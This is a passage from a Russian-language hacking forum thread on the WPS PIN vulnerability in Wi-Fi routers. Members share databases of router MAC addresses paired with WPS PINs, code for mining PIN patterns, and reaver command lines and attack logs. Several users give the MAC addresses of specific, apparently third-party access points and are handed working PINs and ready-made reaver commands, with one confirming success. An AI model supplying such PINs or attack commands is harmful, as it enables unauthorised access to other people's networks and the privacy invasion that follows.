Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

Page 125 of 250
  1. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    Сверяйте сами. Сделано с базы порядка 230 000. Спасибо Sheez и Payer.
    http://rghost.ru/private/8dFPRN2rT/42ab7e28beb4cedac0c5ce35697fb9b3
    У Dlinkов тоже есть совпадения но сделаю позже!
     
    #2481 VladimirV, 20 May 2015
    Anton91x, Vikhedgehog, TOX1C and 1 other person like this.
  2. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,135
    Likes Received:
    1,931
    Reputations:
    24
    Совпадение? Не думаю
    [​IMG]
    хорошо бы базу от дублей почистить
     
    #2482 TOX1C, 20 May 2015
  3. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    У меня совершенно другая программка. От Базы Sheez мне досталось 80 000 - 100 000 уникальных записей.
    И я использовал сортировку по пину и вот такой алгоритм:
    Code:
     if StringGrid1.Cells[c,i] <> '' Then
    begin
     if  ( (StringGrid1.Cells[1,i]) = (StringGrid1.Cells[1,i+1]))
      and ((StringGrid1.Cells[0,i]) <> (StringGrid1.Cells[0,i+1]))
      and ((pos('ASUS',StringGrid1.Cells[5,i])>0)and(pos('ASUS',StringGrid1.Cells[5,i+1])>0))
      and (StringGrid1.Cells[0,i]<>'')and(StringGrid1.Cells[0,i+1]<>'')
      and ((Copy(StringGrid1.Cells[0,i],1,2)) = (Copy(StringGrid1.Cells[0,i+1],1,2)))
      then
      begin
       s := s + StringGrid1.Cells[0, i]+ #9
              + StringGrid1.Cells[1, i]+ #9
              + StringGrid1.Cells[2, i]+ #9
              + StringGrid1.Cells[5, i] + #13#10;
       s := s + StringGrid1.Cells[0, i+1]+ #9
              + StringGrid1.Cells[1, i+1]+ #9
              + StringGrid1.Cells[2, i+1]+ #9
              + StringGrid1.Cells[5, i+1] + #13#10;
       s := s + #13#10;
      end;
    end;
    Вобщем так:
    Если пины одинаковы а маки разные и первые тетрады маков совпадают а модель роутера начинается на 'ASUS' то ОК.
     
    #2483 VladimirV, 20 May 2015
    Last edited: 20 May 2015
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Code:
    60:A4:4C:27:45:28 | 1370790
60:A4:4C:29:DF:10 | 4471585
60:A4:4C:39:70:48 | 5623361
60:A4:4C:3A:3F:44 | 4101362
60:A4:4C:55:A3:AC | 2979473
60:A4:4C:55:AE:E4 | 6199160
60:A4:4C:55:AE:F4 | 1170735
60:A4:4C:65:FA:0D | 3708496
60:A4:4C:65:FA:86 | 8426318
60:A4:4C:65:FE:82 | 2934859
60:A4:4C:65:FF:56 | 3934688
60:A4:4C:66:09:DF | 4613197
60:A4:4C:66:0E:DD | 2784161
60:A4:4C:66:14:29 | 9619962
60:A4:4C:66:17:C4 | 4188717
60:A4:4C:66:3A:33 | 9093840
60:A4:4C:66:54:E8 | 8640206
60:A4:4C:66:C5:60 | 5606887
60:A4:4C:6C:70:18 | 5121358
60:A4:4C:78:F8:60 | 0006203
60:A4:4C:84:2B:6C | 4046760
60:A4:4C:84:4A:D4 | 8701440
60:A4:4C:84:97:74 | 4003325
60:A4:4C:84:DB:DC | 0480521
60:A4:4C:84:E5:B4 | 0402403
60:A4:4C:85:8C:86 | 4976551
60:A4:4C:85:E8:30 | 0241060
60:A4:4C:86:13:D4 | 0432114
60:A4:4C:86:18:AC | 2032624
60:A4:4C:86:51:44 | 4044532
60:A4:4C:86:59:18 | 0308501
60:A4:4C:86:8C:88 | 0056322
60:A4:4C:86:97:18 | 1202530
60:A4:4C:A0:65:B8 | 0196444
60:A4:4C:A0:82:D8 | 4795706
60:A4:4C:A2:CB:A0 | 0222304
60:A4:4C:A3:A3:34 | 4620344
60:A4:4C:A3:DD:F4 | 0301330
60:A4:4C:A4:05:70 | 5030780
60:A4:4C:A4:5C:84 | 3088050
60:A4:4C:A4:DB:70 | 8643140
60:A4:4C:A5:03:70 | 0322341
60:A4:4C:A5:10:D4 | 0431814
60:A4:4C:A6:8A:B0 | 0006642
60:A4:4C:C6:49:40 | 4844930
60:A4:4C:C6:8F:FC | 8202540
60:A4:4C:C6:A6:B4 | 6200400
60:A4:4C:C7:8B:54 | 0303705
60:A4:4C:D0:73:04 | 0602530
60:A4:4C:D0:EA:C8 | 6442200
60:A4:4C:D1:61:24 | 6005302
60:A4:4C:D1:8E:58 | 4043210
60:A4:4C:E0:AC:6C | 4642066
60:A4:4C:F0:01:18 | 2937421
60:A4:4C:F0:3F:78 | 7811247
60:A4:4C:F0:58:50 | 7424744
60:A4:4C:F1:9D:38 | 8911285
    UPD: не заметил 4C в конце, таких увы нет.

    RT-N13U генерирует пин по алгоритму 32-bit PIN - то есть по последним 4 байтам мак адреса.
     
    #2484 binarymaster, 20 May 2015
    4Fun, resident148, Anton91x and 3 others like this.
  5. Talay

    Talay New Member

    Joined:
    20 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Mac c0:4a:00:f4:f8:e4
    Не подскажете пин?
     
    #2485 Talay, 21 May 2015
  6. Stalker5

    Stalker5 Member

    Joined:
    22 Feb 2013
    Messages:
    147
    Likes Received:
    11
    Reputations:
    0
    MAC F0:7D:68:91:5B:C8
    Название точки D-link
    Можете подсказать пин? Заранее Спасибо!
     
    #2486 Stalker5, 21 May 2015
  7. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    Это DIR-300 генераторов к нему нет. Он должен нормально перебираться полным перебором.
     
    #2487 VladimirV, 21 May 2015
  8. Stalker5

    Stalker5 Member

    Joined:
    22 Feb 2013
    Messages:
    147
    Likes Received:
    11
    Reputations:
    0
    я не помню точно, по-моему там мне писало AP rate limited и т.д., вообщем точка банила меня. Попробую ещё раз, может это с другой точкой было, хорошо хоть сигнал хороший.
     
    #2488 Stalker5, 21 May 2015
  9. col

    col Member

    Joined:
    5 Aug 2013
    Messages:
    91
    Likes Received:
    6
    Reputations:
    0
    у меня в андроиде постоянно прописаны 2 программы Wps Connect и Wps Wpa Tester. по сути одинаковы но базы немного отличаются,в общем и с андроидом можно жить.
    единственное там root права нужны,но это другая история
     
    #2489 col, 22 May 2015
  10. pwr2

    pwr2 Member

    Joined:
    1 Oct 2013
    Messages:
    182
    Likes Received:
    49
    Reputations:
    6
    Асус
    10:BF:48 : 91 : D1 : 9C
    Похожие маки кому попадались и с какими пинами?
     
    #2490 pwr2, 22 May 2015
  11. Stalker5

    Stalker5 Member

    Joined:
    22 Feb 2013
    Messages:
    147
    Likes Received:
    11
    Reputations:
    0
    DIR-620_C
    90:94:E4:EE:E7:BC
    Есть ПИН?
     
    #2491 Stalker5, 23 May 2015
  12. resident148

    resident148 Member

    Joined:
    9 May 2015
    Messages:
    53
    Likes Received:
    58
    Reputations:
    2
    30638402 пин к этому роутеру, поправка - 75159320 (пробелы от палева не спасут, не усложняйте простые ситуации)
     
    #2492 resident148, 23 May 2015
    Last edited: 23 May 2015
  13. VladimirV

    VladimirV Well-Known Member

    Joined:
    1 Apr 2013
    Messages:
    1,130
    Likes Received:
    6,150
    Reputations:
    57
    reaver -i mon0 -b 90:94:E4:EE:E7:BC -vv -c -p5656892
    Последнюю цифру ривер добавит сам.
     
    #2493 VladimirV, 23 May 2015
    resident148 likes this.
  14. resident148

    resident148 Member

    Joined:
    9 May 2015
    Messages:
    53
    Likes Received:
    58
    Reputations:
    2
    dlink хорошо подбирается ривером и pixiewps, этот еще и подсказали уже
     
    #2494 resident148, 23 May 2015
    quite gray and VladimirV like this.
  15. Stalker5

    Stalker5 Member

    Joined:
    22 Feb 2013
    Messages:
    147
    Likes Received:
    11
    Reputations:
    0
    Окей, попробую.
     
    #2495 Stalker5, 23 May 2015
  16. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    367
    Likes Received:
    163
    Reputations:
    19
    Ну вообще бывает иногда что новые модели лочатся, например у кого-то из соседей был такой DIR-615, правда без пароля)
     
    #2496 Vikhedgehog, 23 May 2015
  17. Anton91x

    Anton91x Member

    Joined:
    15 May 2015
    Messages:
    18
    Likes Received:
    8
    Reputations:
    0
    Пин подошел, большое спасибо :)
     
    #2497 Anton91x, 24 May 2015
  18. Black3r

    Black3r New Member

    Joined:
    27 Dec 2013
    Messages:
    50
    Likes Received:
    4
    Reputations:
    0
    Вообщем вот что мне выдало, после атаки на одну из точек :
    +] Associated with C0:4A:00:85:F8:BC (ESSID: dfdfdf)
    [+] Trying pin 12345670
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670

    Нахожу эту сеть, подключаюсь, ввожу этот пин, но он вроде как не подходит,хотя, признаться, уровень сигнала небольшой. Хотя точку заранее промониторил с помощью wash
     
    #2498 Black3r, 25 May 2015
  19. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Так и есть, сигнал слишком низкий.
     
    #2499 binarymaster, 25 May 2015
  20. Black3r

    Black3r New Member

    Joined:
    27 Dec 2013
    Messages:
    50
    Likes Received:
    4
    Reputations:
    0
    а какой уровень сигнала считается приемлимым для данной атаки?
     
    #2500 Black3r, 26 May 2015
(You must log in or sign up to post here.)
Page 125 of 250
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.